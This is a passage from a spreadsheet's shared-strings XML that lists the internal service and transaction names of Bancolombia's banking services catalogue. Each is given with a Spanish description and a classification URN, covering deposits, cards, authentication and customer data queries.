    <t>La transaccion 0998 tiene como finalidad generar dos servicios de transferencia masiva, Debito Consolidado y Crédito Consolidado esto con el fin de mostrar en los movimientos de la cuenta, una sola operación consolidada en la cuenta, esto es para los clientes que deseen marcar esta funcionalidad adicional para el llamado (Detallada o consolidada) este tipo de operacion es invocado desde pagos.</t>
  </si>
  <si>
    <t>1000-DP1:Serviciodenotificaciónderecepcióndelotesdemovimientos</t>
  </si>
  <si>
    <t>El servidor transaccional DP1 del grupo de servidores DEP de STI permite realizar la notificación de recepción de un archivo con un lote de movimientos o consultas; el servicio debe recibir la ubicación del archivo plano que contiene los registros a aplicar.</t>
  </si>
  <si>
    <t>1005-DP6-DebitoMasivo</t>
  </si>
  <si>
    <t>Servicio que se encarga de realizar débitos a cuentas depósito de manera masiva</t>
  </si>
  <si>
    <t>1027-SVE:ConsultarDisponibilidaddeNegociación</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción 1027 (CONSULTAR DISPONIBILIDAD DE NEGOCIACIÓN) del servidor SVE,permite consultar la moneda, el monto máximo, mínimo, el trader y las diferentes formas de cumplimiento que se tienen en la compra y venta de divisas. </t>
  </si>
  <si>
    <t>1103-FS1:ConsultaFondosCliente</t>
  </si>
  <si>
    <t>Consulta de Fondos fiduciaria de un Cliente</t>
  </si>
  <si>
    <t>1103-FS2:ConsultaFondosCliente</t>
  </si>
  <si>
    <t>1103-FS3:ConsultaFondosCliente</t>
  </si>
  <si>
    <t>Consulta de Fondos Fiduciaria de un Cliente</t>
  </si>
  <si>
    <t>1103-FS4:ConsultaFondosCliente</t>
  </si>
  <si>
    <t>1103-FS5:ConsultaFondosCliente</t>
  </si>
  <si>
    <t>1103-SVE:Fondoscliente</t>
  </si>
  <si>
    <t>Consulta de los fondos FIC del cliente, valores y fiduciaria</t>
  </si>
  <si>
    <t>1104-FS1:ConsultaDetalle</t>
  </si>
  <si>
    <t>Consulta Detalle de un Fondo Fiduciaria de un Cliente</t>
  </si>
  <si>
    <t>1104-FS2:ConsultaDetalle</t>
  </si>
  <si>
    <t>1104-FS3:ConsultaDetalle</t>
  </si>
  <si>
    <t>1104-FS4:ConsultaDetalle</t>
  </si>
  <si>
    <t>1104-FS5:ConsultaDetalle</t>
  </si>
  <si>
    <t>Consulta de detalle de un Fondo de Fiduciaria de un cliente</t>
  </si>
  <si>
    <t>1107-FS1:ConsultadeMovimientos</t>
  </si>
  <si>
    <t>Consulta de Movimientos de un Fondo Fiduciaria de un Cliente</t>
  </si>
  <si>
    <t>1107-FS2:ConsultadeMovimientos</t>
  </si>
  <si>
    <t>1107-FS3:ConsultadeMovimientos</t>
  </si>
  <si>
    <t>1107-FS4:ConsultadeMovimientos</t>
  </si>
  <si>
    <t>1107-FS5:ConsultadeMovimientos</t>
  </si>
  <si>
    <t>1107-SVE:MovimientosporfondoFICSVE</t>
  </si>
  <si>
    <t>Consulta de los movimientos de un fondo de inversion FIC</t>
  </si>
  <si>
    <t>1108-FS1:ConsultaResumenFondos</t>
  </si>
  <si>
    <t>Consulta de fondos de inversión que retorna, dado un número de producto y un rango de fechas, saldos inicial y final, rendimientos generados, retención cobrada, total en adiciones y total en retiros, para el período ingresado.</t>
  </si>
  <si>
    <t>1108-FS2:ConsultaResumenFondos</t>
  </si>
  <si>
    <t>1108-FS3:ConsultaResumenFondos</t>
  </si>
  <si>
    <t>1108-FS4:ConsultaResumenFondos</t>
  </si>
  <si>
    <t>1108-FS5:ConsultaResumenFondos</t>
  </si>
  <si>
    <t>1206-DP6:Adiciónmasivabolsillos</t>
  </si>
  <si>
    <t>Permite realizar adiciones de la cuenta a bolsillos masivamente de acuerdo a la programación de la transferencia</t>
  </si>
  <si>
    <t>1301-SVE:CONSULTADEMOVIMIENTOSPARADEPOSITOS</t>
  </si>
  <si>
    <t>Consulta de movimientos por pantalla de una cuenta de depósitos en la sucursal virtual empresa</t>
  </si>
  <si>
    <t>1422-PS5:PagoImpuestosPSE_Con_TDC</t>
  </si>
  <si>
    <t>Facilita la compra y/o el pago de impuestos en el canal PSE con tarjeta de crédito.</t>
  </si>
  <si>
    <t>4002-SVJ:TerminosyCondiciones</t>
  </si>
  <si>
    <t>Este servicio consulta la ruta del archivo de términos y condiciones para que por medio de transmiciones tag el aplicativo consumidor pueda obtener el documento de términos y condiciones.</t>
  </si>
  <si>
    <t>4002-SVJ:Terminosycondiciones</t>
  </si>
  <si>
    <t>Este servicio consulta la ruta del archivo de términos y condiciones para que por medio de transmisiones TAC el aplicativo consumidor pueda obtener el documento de términos y condiciones.</t>
  </si>
  <si>
    <t>431-EV2:PagoPspYRecaudoReferenciado-CuentaCte0</t>
  </si>
  <si>
    <t>Permite enrutar el pago para ser procesado en el sistema REC Legado o REC Finacle, dependiendo de la BD que tenga el convenio que se este pagando.</t>
  </si>
  <si>
    <t>4700-SV4:ConsultarInfoOTP</t>
  </si>
  <si>
    <t>La transacción recibe y evalúa la información del cliente. Posteriormente, genera la clave dinamica(OTP) y consulta si el cliente esta inscrito en el sistema de Alertas. Luego, valida si cliente se encuentra en la base de datos de migración para el servicio OTP y finalmente consulta administrador de equivalencias la información de la transacción. Si estas validaciones son exitosas, se ejecuta la migración de clientes ODA a Softoken.</t>
  </si>
  <si>
    <t>4700–SV4:CONSULTARINFOOTP</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción recibe y evalúa la información del cliente. Posteriormente, genera la clave dinamica(OTP) y consulta si el cliente esta inscrito en el sistema de Alertas. Luego, valida si cliente se encuentra en la base de datos de migración para el servicio OTP y finalmente consulta administrador de equivalencias la información de la transacción. Si estas validaciones son exitosas, se ejecuta la migración de clientes ODA a Softoken.
</t>
  </si>
  <si>
    <t>5525-AUD:AlertamientoNotificacionBloqueo</t>
  </si>
  <si>
    <t>detalle de alertamientos al generarse bloqueos</t>
  </si>
  <si>
    <t>6010-APE:TRANSFERENCIASENTRECUENTASDEBANCOLOMBAPAGOQR</t>
  </si>
  <si>
    <t xml:space="preserve">TRANSFERENCIAS ENTRE CUENTAS DE BANCOLOMBA PAGO QR </t>
  </si>
  <si>
    <t>6012-APE:TRANSFERENCIAENTRECTABANCOLOMBIA-CTANEQUIPAGOCONQR</t>
  </si>
  <si>
    <t>TRANSFERENCIA ENTRE CTA BANCOLOMBIA - CTA NEQUI PAGO CON QR</t>
  </si>
  <si>
    <t>7600-CN2:AvanceTarjetadeCreditoporCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar retiro de efectivo de tarjeta de crédito desde Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>9600-CN2:ReversoAvanceTarjetadeCreditoporCB</t>
  </si>
  <si>
    <t>Transacción que permite el reverso automático de un avance con Tarjeta de Crédito por interrupción de la transacción en el datafono.</t>
  </si>
  <si>
    <t>9773-CN2:ReversoDepositoCuentaAhorrosCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso de la operación de depósito a cuenta de ahorros a través del canal Corresponsales Bancarios.</t>
  </si>
  <si>
    <t>9774-CN2:ReversoDepósitoCuentaCorrienteCB</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso de un depósito de cuenta corriente realizado desde CB.</t>
  </si>
  <si>
    <t>9776-CN2:ReversoRetiroConTarjetaCBRedes</t>
  </si>
  <si>
    <t>Transacción que permite realizar el reverso del retiro de cuenta de ahorros con tarjeta débito desde Corresponsal Bancario</t>
  </si>
  <si>
    <t>9777-CN2:ReversoTransferenciadeFondosporCB</t>
  </si>
  <si>
    <t>Permite realizar la reversión de una transferencia de fondos realizada a través del canal corresponsal bancario</t>
  </si>
  <si>
    <t>A100-MT5:TRANSACCIÓNAUTORIZACIONMONEYSEND</t>
  </si>
  <si>
    <t xml:space="preserve">Acreditación MoneySend   
</t>
  </si>
  <si>
    <t>AccederMontoPreaprobadoTarjetaCredito</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Otros</t>
  </si>
  <si>
    <t xml:space="preserve">Permite conocer la disponibilidad del banco para hacer la negociación de divisas, acceder a las condiciones que ofrece el banco para efectuarla y consultar la historia de negociaciones realizadas entre el banco y el cliente.
</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio ActivarAcuerdoTrade proporciona la capacidad de negocio de apertura de productos de comercio internacional. Estos productos se agrupan en tres grandes categorías. Cartas de Crédito, Garantías Bancarias y Cobranzas.
</t>
  </si>
  <si>
    <t xml:space="preserve">El Certificado de Depósito a Término (CDT), es un título valor en el cual el inversionista nos deposita su dinero a un plazo, a una tasa y a una forma de pago determinada, información que será recibida por el servicio de ActivarCDT
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.1.3_Clientes-RelacionamientoConElCliente</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite el registro de transacciones en ITC (Información Transaccional de Clientes). Las transacciones reportadas a través de este servicio se verán reflejadas en los archivos consolidados de ITC un día después de la aplicación de la transacción.
</t>
  </si>
  <si>
    <t>AdministracionProductoAdquirencia</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio AdministracionProductoAdquirencia permitirá a los consumidores crear solicitudes de apertura para el producto Adquirencia en el nuevo core de Adquirencia que es Omnipay.
</t>
  </si>
  <si>
    <t>AdministracionTarjetaEPrepago</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en STI, y van a ser consumidos desde los canales virtuales y tiene la posibilidad de convertirse en API. Las operaciones en el servicio son relacionadas con la gestión del producto tarjeta ePrepago.
</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>AfectacionCuentaDeposito</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes sistemas de Bancolombia realizar la aplicación de movimientos débito y crédito de una cuenta de ahorros y corriente en línea. Así mismo, permite realizar la anulación de débitos y créditos en línea que fueron efectuados durante el mismo día.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.2_Productos-DepositosAPlazo</t>
  </si>
  <si>
    <t>AfectacionMonetariaCuentasDepositos</t>
  </si>
  <si>
    <t>El servicio de Afectación Monetaria Cuenta proporciona a los consumidores, capacidades para realizar transacciones monetarias sobre el producto Cuentas de Ahorro y Corriente.</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en Bankvision, relacionados con la transaccionalidad de Cuentas de Ahorro/Corrientes:
-	acreditarCuenta
-	debitarCuenta
-	anularCredito
-	anularDebito
-	transferirFondosEntreCuentas
-	anularTransferenciaFondosEntreCuentas
</t>
  </si>
  <si>
    <t>AfectacionMonetariaTarjetaCredito</t>
  </si>
  <si>
    <t>El servicio AfectacionMonetariaTarjetaCredito proporciona a los consumidores, capacidades para realizar las transacciones monetarias sobre el producto tarjeta de crédito.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.4_ApoyoCorporativo</t>
  </si>
  <si>
    <t>Aperturadecuenta</t>
  </si>
  <si>
    <t>Este servicio permite realizar la apertura de cuenta (ahorros, corriente) de un cliente, por tipo y número de documento, tipo de cuenta, número de cuenta entre otros campos opcionales que se podrán consultar en la operación del servicio crearCuenta obteniendo como resultado tipo de cuenta y número de cuenta.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.9_Seguridad</t>
  </si>
  <si>
    <t>AutenticacionBiometrica</t>
  </si>
  <si>
    <t>Servicio de autenticacion biometrica</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.9.1_Seguridad-IdentificacionYAutenticacion</t>
  </si>
  <si>
    <t>AutenticacionCliente</t>
  </si>
  <si>
    <t>El servicio AutenticacionCliente habilita la autenticación de clientes Bancolombia del segmento personas, inicialmente a partir del “tipo de documento” y “número de documento” del cliente y a futuro usando el “usuario”.
El Consumidor debe consultar la llave para cifrar el PINBLOCK antes de realizar la autenticación.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.6.2_Externos-DIAN</t>
  </si>
  <si>
    <t>AutenticacionClienteValores</t>
  </si>
  <si>
    <t>El servicio AutenticacionClienteValores permitirá a los consumidores identificar y autenticar a un cliente de valores mediante usuario y contraseña, y a su vez permitirá identificar y autenticar un cliente del banco mediante un código de autorización (código generado previamente en flujo Oauth del banco).</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.9.2_Seguridad-Autorizacion</t>
  </si>
  <si>
    <t xml:space="preserve">Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.1.4_Clientes-GestionDelRiesgoDelCliente</t>
  </si>
  <si>
    <t>Provee la capacidad de negocio de Autenticación de Clientes con el segundo factor de autenticación vía OTP para las transacciones de riesgo en los canales virtuales.</t>
  </si>
  <si>
    <t>AutenticarUsuario</t>
  </si>
  <si>
    <t>BackOfRAdvisor</t>
  </si>
  <si>
    <t>BancaDigitalGatewayService</t>
  </si>
  <si>
    <t>BloquearClienteOTP</t>
  </si>
  <si>
    <t>Este servicio se utiliza para bloquear a los clientes, ya sea de forma voluntaria o por Seguridad Corporativa</t>
  </si>
  <si>
    <t>BloqueoTarjetadeCredito</t>
  </si>
  <si>
    <t>El servicio Bloqueo Tarjeta de Crédito, Permite bloquear y desbloquear una tarjeta de crédito, enviando el código de bloqueo respectivo.</t>
  </si>
  <si>
    <t>C100-MT5:CONSULTAMONEYSEND</t>
  </si>
  <si>
    <t>Servicio que permite consultar el estado de la transacción de envio de dinero (MoneySend), siempre y cuando tengan acceso al aplicativo de MasterCard.</t>
  </si>
  <si>
    <t>C702-SU9:ConsultaElNitDueñoDeLaCuenta</t>
  </si>
  <si>
    <t>Transacción que retornar el nit del propietario de un producto especifico (Cuenta de Ahorro / Corriente / Tarjeta de Credito). Para esto se envía en la desde el Front El tipo de producto de 1 carácter y el numero de producto de 16 dígitos. Con estos valores recibidos se consume la transacción 0002 desde el servidor C03, la cual me retorna el numero de NIT de producto enviado, el cual es retornado al Front en la trama respuesta.</t>
  </si>
  <si>
    <t>CambioPlanCuenta</t>
  </si>
  <si>
    <t>Este servicio permite cambiar el plan de una cuenta que un cliente posea.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.B_Productos-CashManagement</t>
  </si>
  <si>
    <t>ConfirmarContraparteFinanciera</t>
  </si>
  <si>
    <t>La funcionalidad de ConfirmarContraparteFinanciera, comprende la capacidad para confirmar operaciones en moneda extranjera y confirmar préstamos o depósitos a plazo fijo</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.3_ApoyoFinanciero</t>
  </si>
  <si>
    <t>ConsultaBanco</t>
  </si>
  <si>
    <t>ConsultaCalidadTributariaAdquirencia</t>
  </si>
  <si>
    <t>El servicio Consulta Calidad Tributaria Adquirencia permitirá a los consumidores consultar el indicador y la tarifa de impuestos (reteiva, reteica y retefuente) que le aplican a un cliente comercio para el producto adquirencia, dada la actividad económica del cliente, el municipio donde está ubicado el establecimiento y los valores de responsabilidad tributaria de la casilla 53 del RUT.</t>
  </si>
  <si>
    <t>El servicio Consulta Catalogo Maestros, permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor, de los códigos y descripciones de los maestros del banco. (Ejemplo: Cargos, Profesiones del cliente, entre otros).</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.8_Informacion</t>
  </si>
  <si>
    <t>ConsultaClasificacionCartera</t>
  </si>
  <si>
    <t>ConsultaClienteValores</t>
  </si>
  <si>
    <t>El servicio ConsultaClienteValores permitirá a los consumidores consultar si una persona es cliente de valores, además podrá obtener la información detallada de este.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.A_Productos-OperacionesComunesDeProducto</t>
  </si>
  <si>
    <t>ConsultaComisionCanales</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite la consulta relacionadas con las comisiones que se cobran en los canales, como por ejemplo en el momento de una transferencia a otro banco y comisiones por el canal. </t>
  </si>
  <si>
    <t>ConsultaConvenioNomina</t>
  </si>
  <si>
    <t>Proporciona la capacidad de obtener la información de los convenios de nómina.</t>
  </si>
  <si>
    <t>ConsultaCostoComision</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite consultar el costo de las comisiones de los retiros que se realizan en las cuentas Paypal y que se abonaran a las cuentas vinculadas en el banco. </t>
  </si>
  <si>
    <t>Este servicio permite consultar el costo de las comisiones de los retiros que se realizan en las cuentas Paypal y se abonan a las cuentas vinculadas en el banco</t>
  </si>
  <si>
    <t>ConsultaCostosTarjetaDebito</t>
  </si>
  <si>
    <t>ConsultaCreditoConstructor</t>
  </si>
  <si>
    <t>El servicio Consulta Crédito Constructor, permitirá a los consumidores consultar la información como saldos de créditos de los proyectos del constructor junto con los proyectos de las empresas de su grupo económico (fiduciarias).</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.3_Productos-CreditoHipotecario</t>
  </si>
  <si>
    <t>ConsultaCuentaAutorizada</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permitirá la consulta de las operaciones autorizadas que un cliente puede realizar sobre una cuenta de depósito previamente inscrita, de la cual no es el titular. </t>
  </si>
  <si>
    <t>ConsultaCuentaMultiProducto</t>
  </si>
  <si>
    <t>ConsultaCuentasCliente</t>
  </si>
  <si>
    <t>El servicio consulta información cuentas, traerá todas las cuentas activas y que permiten débitos de un cliente.</t>
  </si>
  <si>
    <t>ConsultaCuotaCredito</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento  que se le otorgó.
En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (Valor de la cuota) mientras que el otro concierne a los intereses generados (Tasa nominal mes vencido, Tasa efectiva anual, Valor numérico de la DTF).
</t>
  </si>
  <si>
    <t>Este servicio hace posible consultar información relacionada con productos crediticios tales como límites, cupos correspondientes a obligaciones y garantías asociadas, tanto a nivel de obligaciones como de cliente.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.3.5_ApoyoFin-GestionDelRiesgoCorporativo</t>
  </si>
  <si>
    <t>ConsultaDatosCertificacionesPrestamos</t>
  </si>
  <si>
    <t>En su versión inicial, el servicio ConsultaDatosCertificacionesPrestamos, a partir de la composición de consultas de información de clientes y cartera, permite obtener datos necesarios para la generación de documentos de certificación y paz y salvo sobre préstamos de un cliente.</t>
  </si>
  <si>
    <t>ConsultaDatosComplementariosCliente</t>
  </si>
  <si>
    <t>El servicio permite consultar información que es complementaria del cliente, estos datos corresponden a la calificación de riesgo interna, calificación interna, cliente tesorería, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente o con tipo y número de documento original del cliente.</t>
  </si>
  <si>
    <t>El servicio posibilita a nuevos consumidores o componentes la reutilización expuesta por el servicio ConsultaDatosContactoCliente, el cual sirve para consultar información del contacto (ejemplo: dirección de residencia, teléfonos, email) de los clientes. El servicio obtiene su información de componentes de integración del tipo función de mediación, los cuales implementa las operaciones correspondientes para acceder a cada funcionalidad provista por los datos maestros de MDM de información implementadas a través de procedimientos almacenados.</t>
  </si>
  <si>
    <t>ConsultaDatosDocumentosClientes</t>
  </si>
  <si>
    <t>El servicio Consulta Datos Documentos Clientes, tiene como objetivo Consultar los datos líquidos de un documento del cliente, como la cedula, carta laboral, etc.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.8.3_Informacion-VisualizacionYEntrega</t>
  </si>
  <si>
    <t>ConsultaDatosDocumentosProceso</t>
  </si>
  <si>
    <t>El servicio Consulta Datos Documentos Proceso, tiene como objetivo Consultar los datos líquidos de un proceso específico como una nota crédito, nota débito, etc.</t>
  </si>
  <si>
    <t>ConsultaDatosEmpleado</t>
  </si>
  <si>
    <t>El servicio permite a los diferentes sistemas de Bancolombia, realizar consultas al HUB de los datos almacenados de los empleados que se encuentran en HCM.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.4.1_ApoyoCorporativo-GestionDelTalentoHumano</t>
  </si>
  <si>
    <t>El servicio sirve para consultar la información financiera de los clientes (ejemplo: Ingresos, Egresos, Pasivos, Activos, entre otros). 
El servicio actual cuenta con una operación la cual permite consultar la información a la base de datos MDM enviando la llave de identificación del cliente (CIF;CRM;MDM;NumeroIDentificacion,documentoExterno), retornando la información específica del cliente,  convirtiéndose en un componente de consulta general  de Master Data Management (MDM)</t>
  </si>
  <si>
    <t>ConsultaDatosLiquidos</t>
  </si>
  <si>
    <t>El servicio tiene como objetivo la consulta de datos de los documentos extraidos por Kofax y almacenados en una base de datos (DB LIQUIDA).</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.4.2_ApoyoCorporativo-AdministracionDeDocumentos</t>
  </si>
  <si>
    <t>ConsultaDatosOficina</t>
  </si>
  <si>
    <t xml:space="preserve">A través de este servicio se puede recuperar los datos referentes a las características de una oficina. Estos pueden ser: datos de localización geográfica de la oficina, datos de identificación de la oficina, etc. Adicionalmente, tiene la capacidad de obtener las oficinas asociadas a una plaza. </t>
  </si>
  <si>
    <t>ConsultaDatosPersona</t>
  </si>
  <si>
    <t>ConsultaDatosPersona   ofrece a sus consumidores la posibilidad de consultar la información básica asociada a una identificación, es decir dado un numero y tipo de documento, el servicio responde con nombres apellidos dirección entre otros datos.</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permite consultar la información personal básica del cliente (ejemplo: llave MDM, Tipo identificación, identificación, nombre, apellido del cliente, entre otros) y la información detallada del cliente (ejemplo: ciudad de nacimiento, Fecha nacimiento, Primer nombre, Primer apellido, entre otros).
</t>
  </si>
  <si>
    <t>El servicio sirve para consultar información de las relaciones o vínculos del cliente (tales como: Tipo de referencia: Familiar, personal, gerenciador, datos referencia).
El servicio actual cuenta con una operación la cual permite consultar la información a la base de datos MDM enviando la llave de identificación del cliente (CIF;CRM;MDM;NumeroIDentificacion,documentoExterno), retornando la información específica del cliente,  convirtiéndose en un componente de consulta general  de Master Data Management (MDM)</t>
  </si>
  <si>
    <t>ConsultaDatosTributariosCliente</t>
  </si>
  <si>
    <t>El servicio permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente o con tipo y número de documento original del cliente.</t>
  </si>
  <si>
    <t xml:space="preserve">Nos permite realizar la consulta de los archivos tanto Enviados como Recibidos (ejemplo: Novedades, Cobro, Facturación y Anulación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio. 
Y además para proporcionar al cliente una asesoría completa de sus movimientos.
</t>
  </si>
  <si>
    <t>ConsultaDeChequesConsignados</t>
  </si>
  <si>
    <t>Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior.</t>
  </si>
  <si>
    <t>ConsultaDeProducto</t>
  </si>
  <si>
    <t>ConsultaDeProductoTrade_BM_SVE</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.7_Integracion</t>
  </si>
  <si>
    <t>ConsultaDeProductosTrade</t>
  </si>
  <si>
    <t>Permite al consumidor obtener información específica de los productos Trade. Sin embargo, el servicio tiene varias operaciones que permiten consultar el detalle de los productos, los eventos y los mensajes Swift.</t>
  </si>
  <si>
    <t>ConsultaDetalladaObligacionesHipotecario</t>
  </si>
  <si>
    <t>En su versión inicial, este servicio contiene capacidades que permiten iniciar el proceso de consulta detallada para obligaciones hipotecarias así como, en un segundo momento, recuperar los datos asociados a dicho proceso de consulta.</t>
  </si>
  <si>
    <t>ConsultaDocumentosTarjetaCredito</t>
  </si>
  <si>
    <t>ConsultaExtendidadeSaldos</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio ConsultaExtendidaDeSaldos tiene como objetivo realizar la consulta de saldos de las cuentas depósitos (Ahorros /Corriente) de un cliente Bancolombia de la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.
</t>
  </si>
  <si>
    <t>El servicio ConsultaExtractoCliente permitirá a los consumidores consultar el extracto de un producto en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF.
El servicio también podrá consultar el documento en Base64 y realizar una composición con el servicio de envío de correos electrónicos del banco para que este sea enviado a un correo en particular con clave.</t>
  </si>
  <si>
    <t>El servicio permite obtener los periodos disponibles  para consulta y los extractos, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF.</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Fondos, agrupa todas las consultas (Específicas y detalladas) que se le pueden hacer a los Fondos de inversión de los productos de valores y fiduciaria del Grupo Bancolombia. </t>
  </si>
  <si>
    <t>ConsultaFondosValores</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Fondos Valores, agrupa todas las consultas (Específicas y detalladas) que se le pueden hacer a los Fondos de inversión del producto valores del Grupo Bancolombia. </t>
  </si>
  <si>
    <t>ConsultaFuentesPrivadasExternas</t>
  </si>
  <si>
    <t>ConsultaGMF</t>
  </si>
  <si>
    <t>Este servicio tiene objetivo realizar consultas del GMF (Gravamen de Movimiento Financiero), sobre los productos de inversión el cual se requiere conocer la procedencia de los movimientos monetarios entre cuentas ya sea de inversión como productos fiduciarios. El dato retornado permite ajustar los cálculos de la inversión especialmente los que que tienen cotitulares.</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio posibilita a nuevos consumidores o nuevos componentes la reutilización expuesta por el servicio ConsultaGestionComercialCliente, el cual sirve para consultar información de Gestión comercial de  los clientes. El servicio obtiene su información de componentes de integración del tipo función de mediación, los cuales implementa las operaciones correspondientes para acceder a cada funcionalidad provista por los datos maestros de MDM de información implementadas a través de procedimientos almacenados.
El servicio esta divido en dos operaciones de la siguiente forma: 
•	Gestión comercial: permite la consulta de información para realizar la gestión comercial al cliente, tal como: rol, responsable comercial del cliente, oficina de vinculación, nicho de mercado, segmento, subsegmento, entre otros.
•	Gestión comercial ECA (equipo comercial amplificado): permite proveer información de otras relaciones comerciales existentes entre el cliente y los negocios especializados de moneda extranjera, inversión, fiduciaria, Leasing, etc. Tanto para Personas de las bancas personas y pymes, como para personas de la banca de empresas y gobierno.
</t>
  </si>
  <si>
    <t>ConsultaGirosMulticanalV.1.0</t>
  </si>
  <si>
    <t xml:space="preserve">Ofrece a sus consumidores la posibilidad de realizar los diferentes tipos de consultas relacionas con los giros en los distintos canales ofrecidos por el banco, dentro de sus operaciones se encuentra:
•	buscarGiro
•	buscarGiroPorReferencia
•	consultarTablaComisionGiros
</t>
  </si>
  <si>
    <t>ConsultaInformacionCreditoPyme</t>
  </si>
  <si>
    <t>Este servicio, se encarga de realizar la consulta de los límites, datos básicos del cliente y parámetros generales de crédito pyme, que se deben presentar en la pantalla inicial de cada canal que desee exponer esta funcionalidad.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.6_Externos</t>
  </si>
  <si>
    <t xml:space="preserve"> Servicio que permite realizar las diferentes consultas de la información de tarjetas de crédito, donde se podrá retornar información de campos de estados, saldos, deudas y fechas de la tarjeta que se pueden exponer a nivel de los clientes.
Este servicio está construido para poder brindar servicios de consulta de información de las tarjetas de crédito a los clientes; esto en el contexto funcional de la línea de negocio de Tarjetas (Producto de Bancolombia).</t>
  </si>
  <si>
    <t>El servicio Consulta Llavero Cliente, es un servicio que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave especifica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/numero de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM.</t>
  </si>
  <si>
    <t>ConsultaLlaveroClienteDocumentoExterno</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Llavero Cliente Documento Externo, es un servicio que permite consultar una llave de identificación MDM especifica del cliente según el tipo y numero de documento externo. </t>
  </si>
  <si>
    <t>ConsultaLlaveroComercial</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio: Consulta Llavero Comercial permite consultar información de las llaves de los empleados del banco. Esta información son llaves de los sistemas donde se encuentra el empleado, tal como CIF y CRM. Algunos de los datos que retorna el servicio son: llave empleado CRM, llave empleado CIF (EM), llave MDM del empleado como cliente, llave CRM del empleado como cliente, llave CIF del empleado como cliente, tipo y número de documento original del empleado, entre otros. </t>
  </si>
  <si>
    <t>ConsultaLmeCartera</t>
  </si>
  <si>
    <t>El servicio tiene como alcance la consulta de cupos de clientes originados en el Maestro de Limites en Cartera.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.6.8_Externos-CentraleDeRiesgo</t>
  </si>
  <si>
    <t>El servicio Consulta Metadata Documental permitirá a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así evitar, solicitarles a los clientes estos documentos.
